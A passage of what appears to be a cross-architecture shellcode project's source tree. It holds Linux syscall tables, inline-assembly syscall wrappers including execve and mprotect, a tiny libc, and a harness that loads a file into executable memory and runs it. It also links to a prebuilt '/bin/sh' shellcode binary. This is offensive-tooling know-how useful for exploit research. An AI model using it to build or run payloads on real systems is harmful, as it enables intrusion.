__NR_ioperm 101 106 | #define __NR_socketcall 102 107 | #define __NR_syslog 103 108 | #define __NR_setitimer 104 109 | #define __NR_getitimer 105 110 | #define __NR_stat 106 111 | #define __NR_lstat 107 112 | #define __NR_fstat 108 113 | #define __NR_olduname 109 114 | #define __NR_iopl 110 115 | #define __NR_vhangup 111 116 | #define __NR_idle 112 117 | #define __NR_vm86old 113 118 | #define __NR_wait4 114 119 | #define __NR_swapoff 115 120 | #define __NR_sysinfo 116 121 | #define __NR_ipc 117 122 | #define __NR_fsync 118 123 | #define __NR_sigreturn 119 124 | #define __NR_clone 120 125 | #define __NR_setdomainname 121 126 | #define __NR_uname 122 127 | #define __NR_modify_ldt 123 128 | #define __NR_adjtimex 124 129 | #define __NR_mprotect 125 130 | #define __NR_sigprocmask 126 131 | #define __NR_create_module 127 132 | #define __NR_init_module 128 133 | #define __NR_delete_module 129 134 | #define __NR_get_kernel_syms 130 135 | #define __NR_quotactl 131 136 | #define __NR_getpgid 132 137 | #define __NR_fchdir 133 138 | #define __NR_bdflush 134 139 | #define __NR_sysfs 135 140 | #define __NR_personality 136 141 | #define __NR_afs_syscall 137 142 | #define __NR_setfsuid 138 143 | #define __NR_setfsgid 139 144 | #define __NR__llseek 140 145 | #define __NR_getdents 141 146 | #define __NR__newselect 142 147 | #define __NR_flock 143 148 | #define __NR_msync 144 149 | #define __NR_readv 145 150 | #define __NR_writev 146 151 | #define __NR_getsid 147 152 | #define __NR_fdatasync 148 153 | #define __NR__sysctl 149 154 | #define __NR_mlock 150 155 | #define __NR_munlock 151 156 | #define __NR_mlockall 152 157 | #define __NR_munlockall 153 158 | #define __NR_sched_setparam 154 159 | #define __NR_sched_getparam 155 160 | #define __NR_sched_setscheduler 156 161 | #define __NR_sched_getscheduler 157 162 | #define __NR_sched_yield 158 163 | #define __NR_sched_get_priority_max 159 164 | #define __NR_sched_get_priority_min 160 165 | #define __NR_sched_rr_get_interval 161 166 | #define __NR_nanosleep 162 167 | #define __NR_mremap 163 168 | #define __NR_setresuid 164 169 | #define __NR_getresuid 165 170 | #define __NR_vm86 166 171 | #define __NR_query_module 167 172 | #define __NR_poll 168 173 | #define __NR_nfsservctl 169 174 | #define __NR_setresgid 170 175 | #define __NR_getresgid 171 176 | #define __NR_prctl 172 177 | #define __NR_rt_sigreturn 173 178 | #define __NR_rt_sigaction 174 179 | #define __NR_rt_sigprocmask 175 180 | #define __NR_rt_sigpending 176 181 | #define __NR_rt_sigtimedwait 177 182 | #define __NR_rt_sigqueueinfo 178 183 | #define __NR_rt_sigsuspend 179 184 | #define __NR_pread64 180 185 | #define __NR_pwrite64 181 186 | #define __NR_chown 182 187 | #define __NR_getcwd 183 188 | #define __NR_capget 184 189 | #define __NR_capset 185 190 | #define __NR_sigaltstack 186 191 | #define __NR_sendfile 187 192 | #define __NR_getpmsg 188 193 | #define __NR_putpmsg 189 194 | #define __NR_vfork 190 195 | #define __NR_ugetrlimit 191 196 | #define __NR_mmap2 192 197 | #define __NR_truncate64 193 198 | #define __NR_ftruncate64 194 199 | #define __NR_stat64 195 200 | #define __NR_lstat64 196 201 | #define __NR_fstat64 197 202 | #define __NR_lchown32 198 203 | #define __NR_getuid32 199 204 | #define __NR_getgid32 200 205 | #define __NR_geteuid32 201 206 | #define __NR_getegid32 202 207 | #define __NR_setreuid32 203 208 | #define __NR_setregid32 204 209 | #define __NR_getgroups32 205 210 | #define __NR_setgroups32 206 211 | #define __NR_fchown32 207 212 | #define __NR_setresuid32 208 213 | #define __NR_getresuid32 209 214 | #define __NR_setresgid32 210 215 | #define __NR_getresgid32 211 216 | #define __NR_chown32 212 217 | #define __NR_setuid32 213 218 | #define __NR_setgid32 214 219 | #define __NR_setfsuid32 215 220 | #define __NR_setfsgid32 216 221 | #define __NR_pivot_root 217 222 | #define __NR_mincore 218 223 | #define __NR_madvise 219 224 | #define __NR_getdents64 220 225 | #define __NR_fcntl64 221 226 | #define __NR_gettid 224 227 | #define __NR_readahead 225 228 | #define __NR_setxattr 226 229 | #define __NR_lsetxattr 227 230 | #define __NR_fsetxattr 228 231 | #define __NR_getxattr 229 232 | #define __NR_lgetxattr 230 233 | #define __NR_fgetxattr 231 234 | #define __NR_listxattr 232 235 | #define __NR_llistxattr 233 236 | #define __NR_flistxattr 234 237 | #define __NR_removexattr 235 238 | #define __NR_lremovexattr 236 239 | #define __NR_fremovexattr 237 240 | #define __NR_tkill 238 241 | #define __NR_sendfile64 239 242 | #define __NR_futex 240 243 | #define __NR_sched_setaffinity 241 244 | #define __NR_sched_getaffinity 242 245 | #define __NR_set_thread_area 243 246 | #define __NR_get_thread_area 244 247 | #define __NR_io_setup 245 248 | #define __NR_io_destroy 246 249 | #define __NR_io_getevents 247 250 | #define __NR_io_submit 248 251 | #define __NR_io_cancel 249 252 | #define __NR_fadvise64 250 253 | #define __NR_exit_group 252 254 | #define __NR_lookup_dcookie 253 255 | #define __NR_epoll_create 254 256 | #define __NR_epoll_ctl 255 257 | #define __NR_epoll_wait 256 258 | #define __NR_remap_file_pages 257 259 | #define __NR_set_tid_address 258 260 | #define __NR_timer_create 259 261 | #define __NR_timer_settime 260 262 | #define __NR_timer_gettime 261 263 | #define __NR_timer_getoverrun 262 264 | #define __NR_timer_delete 263 265 | #define __NR_clock_settime 264 266 | #define __NR_clock_gettime 265 267 | #define __NR_clock_getres 266 268 | #define __NR_clock_nanosleep 267 269 | #define __NR_statfs64 268 270 | #define __NR_fstatfs64 269 271 | #define __NR_tgkill 270 272 | #define __NR_utimes 271 273 | #define __NR_fadvise64_64 272 274 | #define __NR_vserver 273 275 | #define __NR_mbind 274 276 | #define __NR_get_mempolicy 275 277 | #define __NR_set_mempolicy 276 278 | #define __NR_mq_open 277 279 | #define __NR_mq_unlink 278 280 | #define __NR_mq_timedsend 279 281 | #define __NR_mq_timedreceive 280 282 | #define __NR_mq_notify 281 283 | #define __NR_mq_getsetattr 282 284 | #define __NR_kexec_load 283 285 | #define __NR_waitid 284 286 | #define __NR_add_key 286 287 | #define __NR_request_key 287 288 | #define __NR_keyctl 288 289 | #define __NR_ioprio_set 289 290 | #define __NR_ioprio_get 290 291 | #define __NR_inotify_init 291 292 | #define __NR_inotify_add_watch 292 293 | #define __NR_inotify_rm_watch 293 294 | #define __NR_migrate_pages 294 295 | #define __NR_openat 295 296 | #define __NR_mkdirat 296 297 | #define __NR_mknodat 297 298 | #define __NR_fchownat 298 299 | #define __NR_futimesat 299 300 | #define __NR_fstatat64 300 301 | #define __NR_unlinkat 301 302 | #define __NR_renameat 302 303 | #define __NR_linkat 303 304 | #define __NR_symlinkat 304 305 | #define __NR_readlinkat 305 306 | #define __NR_fchmodat 306 307 | #define __NR_faccessat 307 308 | #define __NR_pselect6 308 309 | #define __NR_ppoll 309 310 | #define __NR_unshare 310 311 | #define __NR_set_robust_list 311 312 | #define __NR_get_robust_list 312 313 | #define __NR_splice 313 314 | #define __NR_sync_file_range 314 315 | #define __NR_tee 315 316 | #define __NR_vmsplice 316 317 | #define __NR_move_pages 317 318 | #define __NR_getcpu 318 319 | #define __NR_epoll_pwait 319 320 | #define __NR_utimensat 320 321 | #define __NR_signalfd 321 322 | #define __NR_timerfd_create 322 323 | #define __NR_eventfd 323 324 | #define __NR_fallocate 324 325 | #define __NR_timerfd_settime 325 326 | #define __NR_timerfd_gettime 326 327 | #define __NR_signalfd4 327 328 | #define __NR_eventfd2 328 329 | #define __NR_epoll_create1 329 330 | #define __NR_dup3 330 331 | #define __NR_pipe2 331 332 | #define __NR_inotify_init1 332 333 | #define __NR_preadv 333 334 | #define __NR_pwritev 334 335 | #define __NR_rt_tgsigqueueinfo 335 336 | #define __NR_perf_event_open 336 337 | #define __NR_recvmmsg 337 338 | #define __NR_fanotify_init 338 339 | #define __NR_fanotify_mark 339 340 | #define __NR_prlimit64 340 341 | #define __NR_name_to_handle_at 341 342 | #define __NR_open_by_handle_at 342 343 | #define __NR_clock_adjtime 343 344 | #define __NR_syncfs 344 345 | #define __NR_sendmmsg 345 346 | #define __NR_setns 346 347 | #define __NR_process_vm_readv 347 348 | #define __NR_process_vm_writev 348 349 | #define __NR_kcmp 349 350 | #define __NR_finit_module 350 351 | #define __NR_sched_setattr 351 352 | #define __NR_sched_getattr 352 353 | #define __NR_renameat2 353 354 | #define __NR_memfd_create 356 355 | 356 | #endif /* _ASM_X86_UNISTD_32_H */ 357 | -------------------------------------------------------------------------------- /stage2/syscall_x86_64.c: -------------------------------------------------------------------------------- 1 | #include "syscall_x86_64.h" 2 | #include "linuxdefs.h" 3 | 4 | ssize_t _read(int fd, void *buf, size_t size) 5 | { 6 | ssize_t ret; 7 | asm volatile 8 | ( 9 | "syscall" 10 | : "=a" (ret) 11 | : "0"(__NR_read), "D"(fd), "S"(buf), "d"(size) 12 | : "cc", "rcx", "r11", "memory" 13 | ); 14 | return ret; 15 | } 16 | 17 | 18 | ssize_t _write(int fd, const void *buf, size_t size) 19 | { 20 | ssize_t ret; 21 | asm volatile 22 | ( 23 | "syscall" 24 | : "=a" (ret) 25 | : "0"(__NR_write), "D"(fd), "S"(buf), "d"(size) 26 | : "cc", "rcx", "r11", "memory" 27 | ); 28 | return ret; 29 | } 30 | 31 | int _open(char *path, int mode, int flags) 32 | { 33 | long ret; 34 | 35 | asm volatile 36 | ( 37 | "syscall" 38 | : "=a" (ret) 39 | : "0"(__NR_open), "D"(path), "S"(mode), "d"(flags) 40 | : "cc", "rcx", "r11", "memory" 41 | ); 42 | return ret; 43 | } 44 | 45 | int _close(int fd) 46 | { 47 | long ret; 48 | 49 | asm volatile 50 | ( 51 | "syscall" 52 | : "=a" (ret) 53 | : "0"(__NR_close), "D"(fd) 54 | : "cc", "rcx", "r11", "memory" 55 | ); 56 | return ret; 57 | } 58 | 59 | long _lseek(int fd, long offset, int whence) 60 | { 61 | long ret; 62 | 63 | asm volatile 64 | ( 65 | "syscall" 66 | : "=a" (ret) 67 | : "0"(__NR_lseek), "D"(fd), "S"(offset), "d"(whence) 68 | : "cc", "rcx", "r11", "memory" 69 | ); 70 | return ret; 71 | } 72 | 73 | void * _mmap(void * start, long length, int prot, int flags, int fd, long offset) 74 | { 75 | register int r10 asm("r10") = flags; 76 | register int r8 asm("r8") = fd; 77 | register int r9 asm("r9") = offset; 78 | void * ret = 0; 79 | 80 | asm volatile 81 | ( 82 | "syscall" 83 | : "=a" (ret) 84 | : "0"(__NR_mmap), "D"(start), "S"(length), "d"(prot), "r"(r10), "r"(r8), "r"(r9) 85 | : "cc", "rcx", "r11", "memory" 86 | ); 87 | 88 | return ret; 89 | } 90 | 91 | long _mprotect(void * addr, long len, int prot) 92 | { 93 | long ret; 94 | 95 | asm volatile 96 | ( 97 | "syscall" 98 | : "=a" (ret) 99 | : "0"(__NR_mprotect), "D"(addr), "S"(len), "d"(prot) 100 | : "cc", "rcx", "r11", "memory" 101 | ); 102 | return ret; 103 | } 104 | 105 | long _munmap(char * start, int length) 106 | { 107 | long ret; 108 | 109 | asm volatile 110 | ( 111 | "syscall" 112 | : "=a" (ret) 113 | : "0"(__NR_munmap), "D"(start), "S"(length) 114 | : "cc", "rcx", "r11", "memory" 115 | ); 116 | return ret; 117 | } 118 | 119 | long _brk(unsigned long addr) 120 | { 121 | long ret; 122 | 123 | asm volatile 124 | ( 125 | "syscall" 126 | : "=a" (ret) 127 | : "0"(__NR_brk), "D"(addr) 128 | : "cc", "rcx", "r11", "memory" 129 | ); 130 | 131 | return ret; 132 | } 133 | 134 | int _exit(int level) 135 | { 136 | long ret; 137 | 138 | asm volatile 139 | ( 140 | "syscall" 141 | : "=a" (ret) 142 | : "0"(__NR_exit), "D"(level) 143 | : "cc", "rcx", "r11", "memory" 144 | ); 145 | return (ret); 146 | } 147 | 148 | long _execve(char * filename, char ** argv, char ** envp) 149 | { 150 | long ret; 151 | 152 | asm volatile 153 | ( 154 | "syscall" 155 | : "=a" (ret) 156 | : "0"(__NR_execve), "D"(filename), "S"(argv), "d"(envp) 157 | : "cc", "rcx", "r11", "memory" 158 | ); 159 | return ret; 160 | } 161 | -------------------------------------------------------------------------------- /stage2/syscall_x86_64.h: -------------------------------------------------------------------------------- 1 | #ifndef _ASM_X86_UNISTD_64_H 2 | #define _ASM_X86_UNISTD_64_H 1 3 | 4 | #define __NR_read 0 5 | #define __NR_write 1 6 | #define __NR_open 2 7 | #define __NR_close 3 8 | #define __NR_stat 4 9 | #define __NR_fstat 5 10 | #define __NR_lstat 6 11 | #define __NR_poll 7 12 | #define __NR_lseek 8 13 | #define __NR_mmap 9 14 | #define __NR_mprotect 10 15 | #define __NR_munmap 11 16 | #define __NR_brk 12 17 | #define __NR_rt_sigaction 13 18 | #define __NR_rt_sigprocmask 14 19 | #define __NR_rt_sigreturn 15 20 | #define __NR_ioctl 16 21 | #define __NR_pread64 17 22 | #define __NR_pwrite64 18 23 | #define __NR_readv 19 24 | #define __NR_writev 20 25 | #define __NR_access 21 26 | #define __NR_pipe 22 27 | #define __NR_select 23 28 | #define __NR_sched_yield 24 29 | #define __NR_mremap 25 30 | #define __NR_msync 26 31 | #define __NR_mincore 27 32 | #define __NR_madvise 28 33 | #define __NR_shmget 29 34 | #define __NR_shmat 30 35 | #define __NR_shmctl 31 36 | #define __NR_dup 32 37 | #define __NR_dup2 33 38 | #define __NR_pause 34 39 | #define __NR_nanosleep 35 40 | #define __NR_getitimer 36 41 | #define __NR_alarm 37 42 | #define __NR_setitimer 38 43 | #define __NR_getpid 39 44 | #define __NR_sendfile 40 45 | #define __NR_socket 41 46 | #define __NR_connect 42 47 | #define __NR_accept 43 48 | #define __NR_sendto 44 49 | #define __NR_recvfrom 45 50 | #define __NR_sendmsg 46 51 | #define __NR_recvmsg 47 52 | #define __NR_shutdown 48 53 | #define __NR_bind 49 54 | #define __NR_listen 50 55 | #define __NR_getsockname 51 56 | #define __NR_getpeername 52 57 | #define __NR_socketpair 53 58 | #define __NR_setsockopt 54 59 | #define __NR_getsockopt 55 60 | #define __NR_clone 56 61 | #define __NR_fork 57 62 | #define __NR_vfork 58 63 | #define __NR_execve 59 64 | #define __NR_exit 60 65 | #define __NR_wait4 61 66 | #define __NR_kill 62 67 | #define __NR_uname 63 68 | #define __NR_semget 64 69 | #define __NR_semop 65 70 | #define __NR_semctl 66 71 | #define __NR_shmdt 67 72 | #define __NR_msgget 68 73 | #define __NR_msgsnd 69 74 | #define __NR_msgrcv 70 75 | #define __NR_msgctl 71 76 | #define __NR_fcntl 72 77 | #define __NR_flock 73 78 | #define __NR_fsync 74 79 | #define __NR_fdatasync 75 80 | #define __NR_truncate 76 81 | #define __NR_ftruncate 77 82 | #define __NR_getdents 78 83 | #define __NR_getcwd 79 84 | #define __NR_chdir 80 85 | #define __NR_fchdir 81 86 | #define __NR_rename 82 87 | #define __NR_mkdir 83 88 | #define __NR_rmdir 84 89 | #define __NR_creat 85 90 | #define __NR_link 86 91 | #define __NR_unlink 87 92 | #define __NR_symlink 88 93 | #define __NR_readlink 89 94 | #define __NR_chmod 90 95 | #define __NR_fchmod 91 96 | #define __NR_chown 92 97 | #define __NR_fchown 93 98 | #define __NR_lchown 94 99 | #define __NR_umask 95 100 | #define __NR_gettimeofday 96 101 | #define __NR_getrlimit 97 102 | #define __NR_getrusage 98 103 | #define __NR_sysinfo 99 104 | #define __NR_times 100 105 | #define __NR_ptrace 101 106 | #define __NR_getuid 102 107 | #define __NR_syslog 103 108 | #define __NR_getgid 104 109 | #define __NR_setuid 105 110 | #define __NR_setgid 106 111 | #define __NR_geteuid 107 112 | #define __NR_getegid 108 113 | #define __NR_setpgid 109 114 | #define __NR_getppid 110 115 | #define __NR_getpgrp 111 116 | #define __NR_setsid 112 117 | #define __NR_setreuid 113 118 | #define __NR_setregid 114 119 | #define __NR_getgroups 115 120 | #define __NR_setgroups 116 121 | #define __NR_setresuid 117 122 | #define __NR_getresuid 118 123 | #define __NR_setresgid 119 124 | #define __NR_getresgid 120 125 | #define __NR_getpgid 121 126 | #define __NR_setfsuid 122 127 | #define __NR_setfsgid 123 128 | #define __NR_getsid 124 129 | #define __NR_capget 125 130 | #define __NR_capset 126 131 | #define __NR_rt_sigpending 127 132 | #define __NR_rt_sigtimedwait 128 133 | #define __NR_rt_sigqueueinfo 129 134 | #define __NR_rt_sigsuspend 130 135 | #define __NR_sigaltstack 131 136 | #define __NR_utime 132 137 | #define __NR_mknod 133 138 | #define __NR_uselib 134 139 | #define __NR_personality 135 140 | #define __NR_ustat 136 141 | #define __NR_statfs 137 142 | #define __NR_fstatfs 138 143 | #define __NR_sysfs 139 144 | #define __NR_getpriority 140 145 | #define __NR_setpriority 141 146 | #define __NR_sched_setparam 142 147 | #define __NR_sched_getparam 143 148 | #define __NR_sched_setscheduler 144 149 | #define __NR_sched_getscheduler 145 150 | #define __NR_sched_get_priority_max 146 151 | #define __NR_sched_get_priority_min 147 152 | #define __NR_sched_rr_get_interval 148 153 | #define __NR_mlock 149 154 | #define __NR_munlock 150 155 | #define __NR_mlockall 151 156 | #define __NR_munlockall 152 157 | #define __NR_vhangup 153 158 | #define __NR_modify_ldt 154 159 | #define __NR_pivot_root 155 160 | #define __NR__sysctl 156 161 | #define __NR_prctl 157 162 | #define __NR_arch_prctl 158 163 | #define __NR_adjtimex 159 164 | #define __NR_setrlimit 160 165 | #define __NR_chroot 161 166 | #define __NR_sync 162 167 | #define __NR_acct 163 168 | #define __NR_settimeofday 164 169 | #define __NR_mount 165 170 | #define __NR_umount2 166 171 | #define __NR_swapon 167 172 | #define __NR_swapoff 168 173 | #define __NR_reboot 169 174 | #define __NR_sethostname 170 175 | #define __NR_setdomainname 171 176 | #define __NR_iopl 172 177 | #define __NR_ioperm 173 178 | #define __NR_create_module 174 179 | #define __NR_init_module 175 180 | #define __NR_delete_module 176 181 | #define __NR_get_kernel_syms 177 182 | #define __NR_query_module 178 183 | #define __NR_quotactl 179 184 | #define __NR_nfsservctl 180 185 | #define __NR_getpmsg 181 186 | #define __NR_putpmsg 182 187 | #define __NR_afs_syscall 183 188 | #define __NR_tuxcall 184 189 | #define __NR_security 185 190 | #define __NR_gettid 186 191 | #define __NR_readahead 187 192 | #define __NR_setxattr 188 193 | #define __NR_lsetxattr 189 194 | #define __NR_fsetxattr 190 195 | #define __NR_getxattr 191 196 | #define __NR_lgetxattr 192 197 | #define __NR_fgetxattr 193 198 | #define __NR_listxattr 194 199 | #define __NR_llistxattr 195 200 | #define __NR_flistxattr 196 201 | #define __NR_removexattr 197 202 | #define __NR_lremovexattr 198 203 | #define __NR_fremovexattr 199 204 | #define __NR_tkill 200 205 | #define __NR_time 201 206 | #define __NR_futex 202 207 | #define __NR_sched_setaffinity 203 208 | #define __NR_sched_getaffinity 204 209 | #define __NR_set_thread_area 205 210 | #define __NR_io_setup 206 211 | #define __NR_io_destroy 207 212 | #define __NR_io_getevents 208 213 | #define __NR_io_submit 209 214 | #define __NR_io_cancel 210 215 | #define __NR_get_thread_area 211 216 | #define __NR_lookup_dcookie 212 217 | #define __NR_epoll_create 213 218 | #define __NR_epoll_ctl_old 214 219 | #define __NR_epoll_wait_old 215 220 | #define __NR_remap_file_pages 216 221 | #define __NR_getdents64 217 222 | #define __NR_set_tid_address 218 223 | #define __NR_restart_syscall 219 224 | #define __NR_semtimedop 220 225 | #define __NR_fadvise64 221 226 | #define __NR_timer_create 222 227 | #define __NR_timer_settime 223 228 | #define __NR_timer_gettime 224 229 | #define __NR_timer_getoverrun 225 230 | #define __NR_timer_delete 226 231 | #define __NR_clock_settime 227 232 | #define __NR_clock_gettime 228 233 | #define __NR_clock_getres 229 234 | #define __NR_clock_nanosleep 230 235 | #define __NR_exit_group 231 236 | #define __NR_epoll_wait 232 237 | #define __NR_epoll_ctl 233 238 | #define __NR_tgkill 234 239 | #define __NR_utimes 235 240 | #define __NR_vserver 236 241 | #define __NR_mbind 237 242 | #define __NR_set_mempolicy 238 243 | #define __NR_get_mempolicy 239 244 | #define __NR_mq_open 240 245 | #define __NR_mq_unlink 241 246 | #define __NR_mq_timedsend 242 247 | #define __NR_mq_timedreceive 243 248 | #define __NR_mq_notify 244 249 | #define __NR_mq_getsetattr 245 250 | #define __NR_kexec_load 246 251 | #define __NR_waitid 247 252 | #define __NR_add_key 248 253 | #define __NR_request_key 249 254 | #define __NR_keyctl 250 255 | #define __NR_ioprio_set 251 256 | #define __NR_ioprio_get 252 257 | #define __NR_inotify_init 253 258 | #define __NR_inotify_add_watch 254 259 | #define __NR_inotify_rm_watch 255 260 | #define __NR_migrate_pages 256 261 | #define __NR_openat 257 262 | #define __NR_mkdirat 258 263 | #define __NR_mknodat 259 264 | #define __NR_fchownat 260 265 | #define __NR_futimesat 261 266 | #define __NR_newfstatat 262 267 | #define __NR_unlinkat 263 268 | #define __NR_renameat 264 269 | #define __NR_linkat 265 270 | #define __NR_symlinkat 266 271 | #define __NR_readlinkat 267 272 | #define __NR_fchmodat 268 273 | #define __NR_faccessat 269 274 | #define __NR_pselect6 270 275 | #define __NR_ppoll 271 276 | #define __NR_unshare 272 277 | #define __NR_set_robust_list 273 278 | #define __NR_get_robust_list 274 279 | #define __NR_splice 275 280 | #define __NR_tee 276 281 | #define __NR_sync_file_range 277 282 | #define __NR_vmsplice 278 283 | #define __NR_move_pages 279 284 | #define __NR_utimensat 280 285 | #define __NR_epoll_pwait 281 286 | #define __NR_signalfd 282 287 | #define __NR_timerfd_create 283 288 | #define __NR_eventfd 284 289 | #define __NR_fallocate 285 290 | #define __NR_timerfd_settime 286 291 | #define __NR_timerfd_gettime 287 292 | #define __NR_accept4 288 293 | #define __NR_signalfd4 289 294 | #define __NR_eventfd2 290 295 | #define __NR_epoll_create1 291 296 | #define __NR_dup3 292 297 | #define __NR_pipe2 293 298 | #define __NR_inotify_init1 294 299 | #define __NR_preadv 295 300 | #define __NR_pwritev 296 301 | #define __NR_rt_tgsigqueueinfo 297 302 | #define __NR_perf_event_open 298 303 | #define __NR_recvmmsg 299 304 | #define __NR_fanotify_init 300 305 | #define __NR_fanotify_mark 301 306 | #define __NR_prlimit64 302 307 | #define __NR_name_to_handle_at 303 308 | #define __NR_open_by_handle_at 304 309 | #define __NR_clock_adjtime 305 310 | #define __NR_syncfs 306 311 | #define __NR_sendmmsg 307 312 | #define __NR_setns 308 313 | #define __NR_getcpu 309 314 | #define __NR_process_vm_readv 310 315 | #define __NR_process_vm_writev 311 316 | #define __NR_kcmp 312 317 | #define __NR_finit_module 313 318 | #define __NR_sched_setattr 314 319 | #define __NR_sched_getattr 315 320 | #define __NR_renameat2 316 321 | #define __NR_memfd_create 319 322 | 323 | #endif /* _ASM_X86_UNISTD_64_H */ 324 | -------------------------------------------------------------------------------- /stage2/utils.c: -------------------------------------------------------------------------------- 1 | #include "utils.h" 2 | 3 | void memset(void * dst, unsigned char c, unsigned int len) 4 | { 5 | unsigned char * p = (unsigned char *) dst; 6 | 7 | while(len--) 8 | *p++ = c; 9 | } 10 | 11 | int memcmp(void * dst, void * src, unsigned int len) 12 | { 13 | unsigned char * d = (unsigned char *) dst; 14 | unsigned char * s = (unsigned char *) src; 15 | 16 | while(len-- > 0) 17 | if(*d++ != *s++) 18 | return 1; 19 | 20 | return 0; 21 | } 22 | 23 | void memcpy(void *dst, void *src, unsigned int len) 24 | { 25 | unsigned char * d = (unsigned char *) dst; 26 | unsigned char * s = (unsigned char *) src; 27 | 28 | while(len--) 29 | *d++ = *s++; 30 | } 31 | 32 | int strlen(unsigned char *str) 33 | { 34 | int n = 0; 35 | 36 | while(*str++) 37 | n++; 38 | 39 | return n; 40 | } 41 | 42 | void printf(char *str, ...) 43 | { 44 | int len; 45 | va_list vl; 46 | char buf[4096]; 47 | 48 | va_start (vl, str); 49 | len = vsnprintf (buf, sizeof (buf), str, vl); 50 | va_end (vl); 51 | buf[sizeof (buf) - 1] = '\0'; 52 | 53 | _write(1, buf, len); 54 | 55 | return; 56 | } 57 | 58 | 59 | // MBH malloc 60 | // use mmap for every required block 61 | // block header = [unsigned long user_size] [unsigned long allocd_size] 62 | #define MBM_PAGE_SIZE 0x1000 63 | #define MBM_SIZE_USER(ptr) (*(unsigned long *) ((unsigned long)(ptr) - 2 * sizeof(unsigned long))) 64 | #define MBM_SIZE_ALLOC(ptr) (*(unsigned long *) ((unsigned long)(ptr) - 1 * sizeof(unsigned long))) 65 | #define MBM_SIZE_HDR (2 * sizeof(unsigned long)) 66 | 67 | void * realloc(void * addr, size_t size) 68 | { 69 | size_t alloc_size; 70 | unsigned long mem; 71 | 72 | if(!size) 73 | return NULL; 74 | 75 | if(addr && size < 0x1000 - MBM_SIZE_HDR) 76 | { 77 | MBM_SIZE_USER(addr) = size; 78 | return addr; 79 | } 80 | 81 | alloc_size = size + MBM_SIZE_HDR; 82 | if(alloc_size % MBM_PAGE_SIZE) 83 | alloc_size = ((alloc_size / MBM_PAGE_SIZE) + 1) * MBM_PAGE_SIZE; 84 | 85 | mem = _mmap(NULL, alloc_size, PROT_READ|PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); 86 | if(mem < 0) 87 | { 88 | printf("> memory allocation error (0x%x bytes)\n", alloc_size); 89 | return NULL; 90 | } 91 | 92 | mem += MBM_SIZE_HDR; 93 | MBM_SIZE_USER(mem) = size; 94 | MBM_SIZE_ALLOC(mem) = alloc_size; 95 | 96 | if(addr && MBM_SIZE_USER(addr)) 97 | memcpy((void*)mem, addr, MBM_SIZE_USER(addr)); 98 | if(addr) 99 | free(addr); 100 | 101 | return (void*)mem; 102 | } 103 | 104 | void * malloc(size_t len) 105 | { 106 | return realloc(NULL, len); 107 | } 108 | 109 | void free(void * ptr) 110 | { 111 | char * page = (char *)(ptr) - MBM_SIZE_HDR; 112 | 113 | if(!ptr) 114 | return; 115 | 116 | _munmap(page, MBM_SIZE_ALLOC(ptr)); 117 | } 118 | 119 | 120 | -------------------------------------------------------------------------------- /stage2/utils.h: -------------------------------------------------------------------------------- 1 | #ifndef _SYMB_UTILS_H 2 | #define _SYMB_UTILS_H 3 | 4 | #include "linuxdefs.h" 5 | #include 6 | 7 | void memset(void * dst, unsigned char c, unsigned int len); 8 | int memcmp(void * dst, void * src, unsigned int len); 9 | void memcpy(void *dst, void *src, unsigned int len); 10 | int strlen(unsigned char *str); 11 | void printf(char *str, ...); 12 | 13 | // mem alloc 14 | void * realloc(void * addr, size_t size); 15 | void * malloc(size_t len); 16 | void free(void * ptr); 17 | 18 | // avoid int truncation issue 19 | void * _mmap(void * start, long length, int prot, int flags, int fd, long offset); 20 | 21 | #endif 22 | -------------------------------------------------------------------------------- /tools/README: -------------------------------------------------------------------------------- 1 | 2016 - ixty 2 | 3 | Shellcode testing utility 4 | 5 | Compiled version distributed for each supported arch 6 | Use this utility to verify that the output functions correctly 7 | 8 | user@x86_64-box $ ./sc_86 ./output 9 | user@x86_64-box $ ./sc_x86_64 ./output 10 | user@armhf-chroot $ ./sc_arm ./output 11 | user@arm64-chroot $ ./sc_arm_64 ./output 12 | 13 | -------------------------------------------------------------------------------- /tools/sc.c: -------------------------------------------------------------------------------- 1 | // 2016 - ixty 2 | // shellcode testing utility 3 | // compile with: 4 | // $ gcc -o sc sc.c 5 | 6 | #include 7 | #include 8 | #include 9 | 10 | int main(int ac, char ** av) 11 | { 12 | FILE * f; 13 | size_t l, ml; 14 | 15 | if(ac < 2 || !(f = fopen(av[1], "rb"))) 16 | { 17 | printf("> usage %s \n", av[0]); 18 | return 1; 19 | } 20 | fseek(f, 0, SEEK_END); 21 | l = ftell(f); 22 | fseek(f, 0, SEEK_SET); 23 | 24 | ml = 0x1000; 25 | while(ml < l) 26 | ml += 0x1000; 27 | 28 | char * mem = (char*)mmap(NULL, ml, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 29 | if(!mem) 30 | return 1; 31 | 32 | fread(mem, l, 1, f); 33 | fclose(f); 34 | mprotect(mem, ml, PROT_READ | PROT_WRITE | PROT_EXEC); 35 | 36 | printf("> sc len 0x%x allocated 0x%x bytes @ 0x%x\n", l, ml, mem); 37 | (*(void(*)()) mem)(); 38 | 39 | return 0; 40 | } 41 | 42 | -------------------------------------------------------------------------------- /tools/sc_arm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ixty/xarch_shellcode/9fd9e373fe043c95e16f3b355e21c4572478aed6/tools/sc_arm -------------------------------------------------------------------------------- /tools/sc_arm_64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ixty/xarch_shellcode/9fd9e373fe043c95e16f3b355e21c4572478aed6/tools/sc_arm_64 -------------------------------------------------------------------------------- /tools/sc_x86: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ixty/xarch_shellcode/9fd9e373fe043c95e16f3b355e21c4572478aed6/tools/sc_x86 -------------------------------------------------------------------------------- /tools/sc_x86_64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ixty/xarch_shellcode/9fd9e373fe043c95e16f3b355e21c4572478aed6/tools/sc_x86_64 -------------------------------------------------------------------------------- /xarch_binsh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ixty/xarch_shellcode/9fd9e373fe043c95e16f3b355e21c4572478aed6/xarch_binsh --------------------------------------------------------------------------------